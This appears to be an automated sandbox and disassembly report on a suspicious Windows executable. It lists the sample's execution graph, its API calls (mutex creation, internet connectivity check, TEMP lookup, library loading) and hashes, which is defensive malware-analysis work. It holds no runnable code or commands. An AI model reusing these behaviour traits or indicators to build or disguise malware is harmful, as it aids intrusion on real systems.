                                                                execution_graph 38607 7ff6a54eff81 38619 7ff6a54f2bb8 38607->38619 38609 7ff6a54eff86 38610 7ff6a54effad GetModuleHandleW 38609->38610 38611 7ff6a54efff7 38609->38611 38610->38611 38617 7ff6a54effba 38610->38617 38612 7ff6a54efe84 11 API calls 38611->38612 38613 7ff6a54f0033 38612->38613 38614 7ff6a54f003a 38613->38614 38615 7ff6a54f0050 11 API calls 38613->38615 38616 7ff6a54f004c 38615->38616 38617->38611 38618 7ff6a54f00a8 GetModuleHandleExW GetProcAddress FreeLibrary 38617->38618 38618->38611 38624 7ff6a54f38c4 47 API calls 3 library calls 38619->38624 38621 7ff6a54f2bc1 38625 7ff6a54ed1b8 47 API calls 2 library calls 38621->38625 38624->38621 38626 7ff6a54dd690 38649 7ff6a54dd25c 38626->38649 38629 7ff6a54dd7dc 38719 7ff6a54ddba8 7 API calls 2 library calls 38629->38719 38630 7ff6a54dd6ac __scrt_acquire_startup_lock 38632 7ff6a54dd7e6 38630->38632 38639 7ff6a54dd6ca __scrt_release_startup_lock 38630->38639 38720 7ff6a54ddba8 7 API calls 2 library calls 38632->38720 38634 7ff6a54dd6ef 38635 7ff6a54dd7f1 BuildCatchObjectHelperInternal 38636 7ff6a54dd775 38657 7ff6a54ddcf0 38636->38657 38638 7ff6a54dd77a 38660 7ff6a54f1154 38638->38660 38639->38634 38639->38636 38716 7ff6a54f014c 47 API calls __GSHandlerCheck_EH 38639->38716 38646 7ff6a54dd79d 38646->38635 38718 7ff6a54dd3e0 7 API calls 38646->38718 38648 7ff6a54dd7b4 38648->38634 38650 7ff6a54dd264 38649->38650 38721 7ff6a54df200 38650->38721 38653 7ff6a54dd279 38653->38629 38653->38630 38769 7ff6a55056a0 38657->38769 38659 7ff6a54ddd07 GetStartupInfoW 38659->38638 38771 7ff6a54fc640 38660->38771 38662 7ff6a54dd782 38665 7ff6a54a15c0 CreateMutexExW GetLastError 38662->38665 38663 7ff6a54f1163 38663->38662 38777 7ff6a54fc97c 47 API calls TranslateName 38663->38777 38666 7ff6a54a161e 38665->38666 38780 7ff6a54a8150 80 API calls 38666->38780 38668 7ff6a54a1623 38781 7ff6a54a8390 18 API calls 2 library calls 38668->38781 38670 7ff6a54a1639 38782 7ff6a54a5790 11 API calls std::_Locinfo::_Getcvt 38670->38782 38672 7ff6a54a19c7 38673 7ff6a54a19d2 CreateMutexW GetLastError 38672->38673 38674 7ff6a54a1dd8 38672->38674 38675 7ff6a54a1a10 38673->38675 38789 7ff6a54a5890 63 API calls 6 library calls 38674->38789 38783 7ff6a54a8200 58 API calls 5 library calls 38675->38783 38678 7ff6a54a1de4 38680 7ff6a54a1def GetEnvironmentVariableW 38678->38680 38681 7ff6a54a1ef0 CloseHandle 38678->38681 38679 7ff6a54a1a15 38784 7ff6a54a81c0 InternetCheckConnectionW 38679->38784 38682 7ff6a54a1e22 CloseHandle 38680->38682 38683 7ff6a54a1e37 38680->38683 38684 7ff6a54a1ebf 38681->38684 38682->38684 38790 7ff6a54acd80 49 API calls 2 library calls 38683->38790 38799 7ff6a54dd560 8 API calls 2 library calls 38684->38799 38688 7ff6a54a1e4c 38791 7ff6a54a92d0 49 API calls Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock 38688->38791 38689 7ff6a54a1f0d 38717 7ff6a54ddd34 GetModuleHandleW 38689->38717 38691 7ff6a54a1e63 38792 7ff6a54a9280 49 API calls Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock 38691->38792 38693 7ff6a54a1a1b Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock 38785 7ff6a54ad2c0 49 API calls 38693->38785 38695 7ff6a54a1e7a 38793 7ff6a54adff0 47 API calls collate 38695->38793 38696 7ff6a54a1a9c 38786 7ff6a54a6ff0 61 API calls 4 library calls 38696->38786 38699 7ff6a54a1e87 38794 7ff6a54adff0 47 API calls collate 38699->38794 38700 7ff6a54a1abe 38787 7ff6a54ac610 49 API calls 3 library calls 38700->38787 38703 7ff6a54a1e94 38795 7ff6a54a20a0 67 API calls 5 library calls 38703->38795 38705 7ff6a54a1e9a 38706 7ff6a54a1e9e CloseHandle 38705->38706 38707 7ff6a54a1ec5 Concurrency::details::WorkQueue::IsStructuredEmpty 38705->38707 38796 7ff6a54adff0 47 API calls collate 38706->38796 38797 7ff6a54a25e0 50 API calls 2 library calls 38707->38797 38708 7ff6a54a1ad2 std::ios_base::failure::failure 38788 7ff6a54a7910 102 API calls 38708->38788 38712 7ff6a54a1d61 CloseHandle Sleep 38712->38674 38713 7ff6a54a1ee2 38798 7ff6a54adff0 47 API calls collate 38713->38798 38715 7ff6a54a1eef 38715->38681 38716->38636 38717->38646 38718->38648 38719->38632 38720->38635 38733 7ff6a54e2778 38721->38733 38724 7ff6a54dd275 38724->38653 38728 7ff6a54f106c 38724->38728 38726 7ff6a54df216 38726->38724 38740 7ff6a54e27c0 DeleteCriticalSection 38726->38740 38730 7ff6a54fd53c 38728->38730 38729 7ff6a54dd282 38729->38653 38732 7ff6a54df228 7 API calls 2 library calls 38729->38732 38730->38729 38757 7ff6a54f5088 38730->38757 38732->38653 38734 7ff6a54e2780 38733->38734 38736 7ff6a54e27b1 38734->38736 38737 7ff6a54df209 38734->38737 38741 7ff6a54e2b18 38734->38741 38746 7ff6a54e27c0 DeleteCriticalSection 38736->38746 38737->38724 38739 7ff6a54df5d0 8 API calls 3 library calls 38737->38739 38739->38726 38740->38724 38747 7ff6a54e289c 38741->38747 38744 7ff6a54e2b63 InitializeCriticalSectionAndSpinCount 38745 7ff6a54e2b58 38744->38745 38745->38734 38746->38737 38748 7ff6a54e2986 38747->38748 38749 7ff6a54e28e0 __vcrt_InitializeCriticalSectionEx 38747->38749 38748->38744 38748->38745 38749->38748 38750 7ff6a54e290e LoadLibraryExW 38749->38750 38753 7ff6a54e29cd GetProcAddress 38749->38753 38756 7ff6a54e2951 LoadLibraryExW 38749->38756 38751 7ff6a54e292f GetLastError 38750->38751 38752 7ff6a54e29ad 38750->38752 38751->38749 38752->38753 38754 7ff6a54e29c4 FreeLibrary 38752->38754 38753->38748 38755 7ff6a54e29de 38753->38755 38754->38753 38755->38748 38756->38749 38756->38752 38768 7ff6a54e6cf4 EnterCriticalSection 38757->38768 38759 7ff6a54f5098 38760 7ff6a54fd80c 53 API calls 38759->38760 38761 7ff6a54f50a1 38760->38761 38763 7ff6a54f4e90 55 API calls 38761->38763 38767 7ff6a54f50af 38761->38767 38762 7ff6a54e6d48 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 38765 7ff6a54f50bb 38762->38765 38764 7ff6a54f50aa 38763->38764 38766 7ff6a54f4f80 GetStdHandle GetFileType 38764->38766 38765->38730 38766->38767 38767->38762 38770 7ff6a5505690 38769->38770 38770->38659 38770->38770 38772 7ff6a54fc64d 38771->38772 38776 7ff6a54fc692 38771->38776 38778 7ff6a54f3998 52 API calls 3 library calls 38772->38778 38774 7ff6a54fc67c 38779 7ff6a54fc318 67 API calls 3 library calls 38774->38779 38776->38663 38777->38663 38778->38774 38779->38776 38780->38668 38781->38670 38782->38672 38783->38679 38784->38693 38785->38696 38786->38700 38787->38708 38788->38712 38789->38678 38790->38688 38791->38691 38792->38695 38793->38699 38794->38703 38795->38705 38796->38684 38797->38713 38798->38715 38799->38689

                                                                Executed Functions

                                                                Function 00007FF6A54A15C0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 138synchronizationCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorLastMutex
                                                                • String ID: #$Global\e788d6624a$Global\f4855f59e0$TEMP
                                                                • API String ID: 1925916568-2530975203
                                                                • Opcode ID: 49f0978e79ec638ee00da9cd3dfa66dc4eb03f01a4dd2dff627060d76ca64697
                                                                • Instruction ID: cd378856d0de4a6fe9d5031abf698b9b908d103d3dc6026b817b75fa67531ac2
                                                                • Opcode Fuzzy Hash: 49f0978e79ec638ee00da9cd3dfa66dc4eb03f01a4dd2dff627060d76ca64697
                                                                • Instruction Fuzzy Hash: DF614325A1EA8295F6A0EB21E8543FB6364FF86B45F801432E68EC25D6DF2CED05C710
                                                                Function 00007FF6A54F428C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF6A54F4BF4,?,?,?,?,00007FF6A54E6D6D,?,?,?,?,00007FF6A54B4584), ref: 00007FF6A54F4408
                                                                • GetProcAddress.KERNEL32(?,?,00000000,00007FF6A54F4BF4,?,?,?,?,00007FF6A54E6D6D,?,?,?,?,00007FF6A54B4584), ref: 00007FF6A54F4414
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeLibraryProc
                                                                • String ID: api-ms-$ext-ms-
                                                                • API String ID: 3013587201-537541572
                                                                • Opcode ID: d50a6e04bc889a94e9310a24b4b50f1f5700652dd2fda89cb67868192f58020c
                                                                • Instruction ID: c2d1c36bf3ab6f5affb13cac9ef7a9f18f0793c73daee76e11c1255e1b74220c
                                                                • Opcode Fuzzy Hash: d50a6e04bc889a94e9310a24b4b50f1f5700652dd2fda89cb67868192f58020c
                                                                • Instruction Fuzzy Hash: A241E226B1BA1285FA65DB2AA8006B92391FF46FE4F499535DD0DC7784EE3CEC498300
                                                                Function 00007FF6A54DD690 Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: __scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                • String ID:
                                                                • API String ID: 1152625263-0
                                                                • Opcode ID: 9ad732d13d0ab0af3469577810eb8c7e971b8c848a3576a797a76545efd1c9fd
                                                                • Instruction ID: 26e3bd7238ed6acbf611e6cf4fab63c7dc1a5ffa0449e3122c20b181fce2efb0
                                                                • Opcode Fuzzy Hash: 9ad732d13d0ab0af3469577810eb8c7e971b8c848a3576a797a76545efd1c9fd
                                                                • Instruction Fuzzy Hash: F3313A26E0F94346FBA4EB6495113B916D1EF87F44F445435E90ECB6E3DE2CAC048390
                                                                Function 00007FF6A54F0050 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: fbd0adf8052ffcc9b0e8859d6c2e1ba8a6d29c7e81dbf81431fdfbc9d1490058
                                                                • Instruction ID: ee4efe9f75ade55d27c472a6a774fdf1e221e5999f920a0fcb995caa74053212
                                                                • Opcode Fuzzy Hash: fbd0adf8052ffcc9b0e8859d6c2e1ba8a6d29c7e81dbf81431fdfbc9d1490058
                                                                • Instruction Fuzzy Hash: 89D09E14B2A7024AFB58AB756C5507D16519F8BF46F04543DD94FC6393ED3DAC4D4700
                                                                Function 00007FF6A54EFF81 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                • String ID:
                                                                • API String ID: 3947729631-0
                                                                • Opcode ID: a173962850deb2e283e54c593ea4824ca8f2867928e25c65a3806b82bfa8fbc4
                                                                • Instruction ID: c47e2463257dc0df96e1fd2c6ed92baea37cd7840a57b69eed35eb7f0dc02386
                                                                • Opcode Fuzzy Hash: a173962850deb2e283e54c593ea4824ca8f2867928e25c65a3806b82bfa8fbc4
                                                                • Instruction Fuzzy Hash: 2A218133E1678199EB64CF68D4402FC37A0EB46B18F544636EA1D86AC9DF38D944C740
                                                                Function 00007FF6A54FD80C Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 3215553584-0
                                                                • Opcode ID: 651a0ccb75aaea49300c198e7ae7e208c017b92abe4d458e04d1672940d29311
                                                                • Instruction ID: 543a27504e5ba10ecced370671911842c796d1c057df33b6b028f4e7169e7611
                                                                • Opcode Fuzzy Hash: 651a0ccb75aaea49300c198e7ae7e208c017b92abe4d458e04d1672940d29311
                                                                • Instruction Fuzzy Hash: 8F116A36A0BA8286F710DB19B48156972A0EF82F90F550534EA6D87AA6DF3CEC14C740
                                                                Function 00007FF6A54F4160 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF6A54F3A9E,?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000), ref: 00007FF6A54F41B5
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AllocHeap
                                                                • String ID:
                                                                • API String ID: 4292702814-0
                                                                • Opcode ID: 894aed0f64889bc6f4bd3071e11743a85ca1bb1a043364d28466e956f208c2d7
                                                                • Instruction ID: 03434f1ba62b587175919391f4aabee5f9f22751156bedc46b8e6c2f5653bb54
                                                                • Opcode Fuzzy Hash: 894aed0f64889bc6f4bd3071e11743a85ca1bb1a043364d28466e956f208c2d7
                                                                • Instruction Fuzzy Hash: 79F06D44F0B20642FE54DBA99A183F54291AF6BF90F1C8934CE0EC63D2EE1CEC888310

                                                                Non-executed Functions

                                                                Function 00007FF6A54D8FC7 Relevance: 50.0, APIs: 33, Instructions: 485COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1073 7ff6a54d8fc7-7ff6a54d8fd5 1074 7ff6a54d8fdb-7ff6a54d8fde 1073->1074 1075 7ff6a54d90ca-7ff6a54d90ce 1073->1075 1078 7ff6a54d8fe4-7ff6a54d8fee 1074->1078 1079 7ff6a54d906d-7ff6a54d9077 1074->1079 1076 7ff6a54d90d4-7ff6a54d90de 1075->1076 1077 7ff6a54d919e-7ff6a54d91a2 1075->1077 1080 7ff6a54d90e0-7ff6a54d90e3 1076->1080 1081 7ff6a54d9148-7ff6a54d914b 1076->1081 1086 7ff6a54d952e-7ff6a54d9532 1077->1086 1087 7ff6a54d91a8-7ff6a54d91b2 1077->1087 1082 7ff6a54d8ff0-7ff6a54d9002 call 7ff6a54b4570 1078->1082 1083 7ff6a54d902b-7ff6a54d903f call 7ff6a54dd1dc 1078->1083 1084 7ff6a54d90b4-7ff6a54d90bf call 7ff6a54d69a0 1079->1084 1085 7ff6a54d9079-7ff6a54d908b call 7ff6a54b4570 1079->1085 1090 7ff6a54d90e5-7ff6a54d90f7 call 7ff6a54b4570 1080->1090 1091 7ff6a54d9120-7ff6a54d9131 call 7ff6a54dd1dc 1080->1091 1088 7ff6a54d914d-7ff6a54d915f call 7ff6a54b4570 1081->1088 1089 7ff6a54d9188-7ff6a54d918b call 7ff6a54d6ab8 1081->1089 1125 7ff6a54d9004-7ff6a54d9014 1082->1125 1126 7ff6a54d901b-7ff6a54d9024 call 7ff6a54b45e8 1082->1126 1129 7ff6a54d9062 1083->1129 1130 7ff6a54d9041-7ff6a54d9060 call 7ff6a54dc780 1083->1130 1119 7ff6a54d90c2-7ff6a54d90c5 call 7ff6a54b8e78 1084->1119 1116 7ff6a54d90a4-7ff6a54d90ad call 7ff6a54b45e8 1085->1116 1117 7ff6a54d908d-7ff6a54d909d 1085->1117 1096 7ff6a54d973d-7ff6a54d975a 1086->1096 1097 7ff6a54d9538-7ff6a54d9542 1086->1097 1098 7ff6a54d91b4-7ff6a54d91b7 1087->1098 1099 7ff6a54d921c-7ff6a54d921f 1087->1099 1135 7ff6a54d9161-7ff6a54d9171 1088->1135 1136 7ff6a54d9178-7ff6a54d9181 call 7ff6a54b45e8 1088->1136 1118 7ff6a54d9190-7ff6a54d9199 call 7ff6a54b8e78 1089->1118 1144 7ff6a54d9110-7ff6a54d9119 call 7ff6a54b45e8 1090->1144 1145 7ff6a54d90f9-7ff6a54d9109 1090->1145 1149 7ff6a54d9143-7ff6a54d9146 1091->1149 1150 7ff6a54d9133-7ff6a54d9141 1091->1150 1110 7ff6a54d95d8-7ff6a54d95db 1097->1110 1111 7ff6a54d9548-7ff6a54d954b 1097->1111 1112 7ff6a54d91f4-7ff6a54d9205 call 7ff6a54dd1dc 1098->1112 1113 7ff6a54d91b9-7ff6a54d91cb call 7ff6a54b4570 1098->1113 1106 7ff6a54d9221-7ff6a54d9233 call 7ff6a54b4570 1099->1106 1107 7ff6a54d925c-7ff6a54d925f call 7ff6a54d6bd0 1099->1107 1167 7ff6a54d9235-7ff6a54d9245 1106->1167 1168 7ff6a54d924c-7ff6a54d9255 call 7ff6a54b45e8 1106->1168 1137 7ff6a54d9264-7ff6a54d9281 call 7ff6a54b8e78 1107->1137 1121 7ff6a54d95dd-7ff6a54d95ef call 7ff6a54b4570 1110->1121 1122 7ff6a54d9618-7ff6a54d9620 call 7ff6a54d7030 1110->1122 1131 7ff6a54d954d-7ff6a54d955f call 7ff6a54b4570 1111->1131 1132 7ff6a54d9588-7ff6a54d959c call 7ff6a54dd1dc 1111->1132 1163 7ff6a54d9217-7ff6a54d921a 1112->1163 1164 7ff6a54d9207-7ff6a54d9215 1112->1164 1159 7ff6a54d91e4-7ff6a54d91ed call 7ff6a54b45e8 1113->1159 1160 7ff6a54d91cd-7ff6a54d91dd 1113->1160 1116->1084 1117->1116 1118->1077 1119->1075 1177 7ff6a54d95f1-7ff6a54d9601 1121->1177 1178 7ff6a54d9608-7ff6a54d9611 call 7ff6a54b45e8 1121->1178 1180 7ff6a54d9623-7ff6a54d9634 call 7ff6a54b8e78 1122->1180 1125->1126 1126->1083 1134 7ff6a54d9065-7ff6a54d906b 1129->1134 1130->1134 1170 7ff6a54d9561-7ff6a54d9571 1131->1170 1171 7ff6a54d9578-7ff6a54d9581 call 7ff6a54b45e8 1131->1171 1174 7ff6a54d95d3 1132->1174 1175 7ff6a54d959e-7ff6a54d95d1 call 7ff6a54d6870 call 7ff6a54dc884 1132->1175 1134->1119 1135->1136 1136->1089 1183 7ff6a54d9283-7ff6a54d9286 1137->1183 1184 7ff6a54d92ea-7ff6a54d92ed 1137->1184 1144->1091 1145->1144 1149->1118 1150->1118 1159->1112 1160->1159 1163->1137 1164->1137 1167->1168 1168->1107 1170->1171 1171->1132 1186 7ff6a54d95d6 1174->1186 1175->1186 1177->1178 1178->1122 1203 7ff6a54d96e0-7ff6a54d96ea 1180->1203 1204 7ff6a54d963a-7ff6a54d9644 1180->1204 1191 7ff6a54d92c3-7ff6a54d92d4 call 7ff6a54dd1dc 1183->1191 1192 7ff6a54d9288-7ff6a54d929a call 7ff6a54b4570 1183->1192 1194 7ff6a54d92ef-7ff6a54d9301 call 7ff6a54b4570 1184->1194 1195 7ff6a54d932a-7ff6a54d932d call 7ff6a54d6ce8 1184->1195 1186->1180 1218 7ff6a54d92e5-7ff6a54d92e8 1191->1218 1219 7ff6a54d92d6-7ff6a54d92e3 1191->1219 1216 7ff6a54d92b3-7ff6a54d92bc call 7ff6a54b45e8 1192->1216 1217 7ff6a54d929c-7ff6a54d92ac 1192->1217 1221 7ff6a54d9303-7ff6a54d9313 1194->1221 1222 7ff6a54d931a-7ff6a54d9323 call 7ff6a54b45e8 1194->1222 1211 7ff6a54d9332-7ff6a54d934a call 7ff6a54b8e78 1195->1211 1208 7ff6a54d96ec-7ff6a54d96fe call 7ff6a54b4570 1203->1208 1209 7ff6a54d9727-7ff6a54d9732 call 7ff6a54d7148 1203->1209 1212 7ff6a54d9681-7ff6a54d9695 call 7ff6a54dd1dc 1204->1212 1213 7ff6a54d9646-7ff6a54d9658 call 7ff6a54b4570 1204->1213 1239 7ff6a54d9700-7ff6a54d9710 1208->1239 1240 7ff6a54d9717-7ff6a54d9720 call 7ff6a54b45e8 1208->1240 1242 7ff6a54d9735-7ff6a54d9738 call 7ff6a54b8e78 1209->1242 1232 7ff6a54d9350-7ff6a54d9353 1211->1232 1233 7ff6a54d93d7-7ff6a54d93da 1211->1233 1236 7ff6a54d96d5 1212->1236 1237 7ff6a54d9697-7ff6a54d96bc call 7ff6a54ed76c 1212->1237 1234 7ff6a54d9671-7ff6a54d967a call 7ff6a54b45e8 1213->1234 1235 7ff6a54d965a-7ff6a54d966a 1213->1235 1216->1191 1217->1216 1218->1211 1219->1211 1221->1222 1222->1195 1244 7ff6a54d9355-7ff6a54d9367 call 7ff6a54b4570 1232->1244 1245 7ff6a54d9390-7ff6a54d93a4 call 7ff6a54dd1dc 1232->1245 1248 7ff6a54d93dc-7ff6a54d93ee call 7ff6a54b4570 1233->1248 1249 7ff6a54d9417-7ff6a54d941f call 7ff6a54d6f18 1233->1249 1234->1212 1235->1234 1250 7ff6a54d96d8-7ff6a54d96de 1236->1250 1261 7ff6a54d96be-7ff6a54d96c9 call 7ff6a54e3a88 1237->1261 1262 7ff6a54d96cb-7ff6a54d96d3 call 7ff6a54e3a88 1237->1262 1239->1240 1240->1209 1242->1096 1265 7ff6a54d9380-7ff6a54d9389 call 7ff6a54b45e8 1244->1265 1266 7ff6a54d9369-7ff6a54d9379 1244->1266 1267 7ff6a54d93d3 1245->1267 1268 7ff6a54d93a6-7ff6a54d93d1 call 7ff6a54d8e48 1245->1268 1271 7ff6a54d93f0-7ff6a54d9400 1248->1271 1272 7ff6a54d9407-7ff6a54d9410 call 7ff6a54b45e8 1248->1272 1273 7ff6a54d9422-7ff6a54d9436 call 7ff6a54b8e78 1249->1273 1250->1242 1261->1262 1262->1250 1265->1245 1266->1265 1277 7ff6a54d93d5 1267->1277 1268->1277 1271->1272 1272->1249 1285 7ff6a54d94d1-7ff6a54d94db 1273->1285 1286 7ff6a54d943c-7ff6a54d9446 1273->1286 1277->1273 1289 7ff6a54d94dd-7ff6a54d94ef call 7ff6a54b4570 1285->1289 1290 7ff6a54d9518-7ff6a54d9523 call 7ff6a54d6e00 1285->1290 1287 7ff6a54d9483-7ff6a54d9497 call 7ff6a54dd1dc 1286->1287 1288 7ff6a54d9448-7ff6a54d945a call 7ff6a54b4570 1286->1288 1301 7ff6a54d94c6 1287->1301 1302 7ff6a54d9499-7ff6a54d94c4 call 7ff6a54d8e48 1287->1302 1299 7ff6a54d9473-7ff6a54d947c call 7ff6a54b45e8 1288->1299 1300 7ff6a54d945c-7ff6a54d946c 1288->1300 1303 7ff6a54d94f1-7ff6a54d9501 1289->1303 1304 7ff6a54d9508-7ff6a54d9511 call 7ff6a54b45e8 1289->1304 1305 7ff6a54d9526-7ff6a54d9529 call 7ff6a54b8e78 1290->1305 1299->1287 1300->1299 1308 7ff6a54d94c9-7ff6a54d94cf 1301->1308 1302->1308 1303->1304 1304->1290 1305->1086 1308->1305
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getcoll
                                                                • String ID:
                                                                • API String ID: 2318601406-0
                                                                • Opcode ID: cb05070e4a46a0c91a05d3284d38072eb71287ef6cbbe2043372dc3e9037a228
                                                                • Instruction ID: a804b2534360cb05f9be6c92ea9fa8483ea674466ee0228b882d9ba9cea5fff8
                                                                • Opcode Fuzzy Hash: cb05070e4a46a0c91a05d3284d38072eb71287ef6cbbe2043372dc3e9037a228
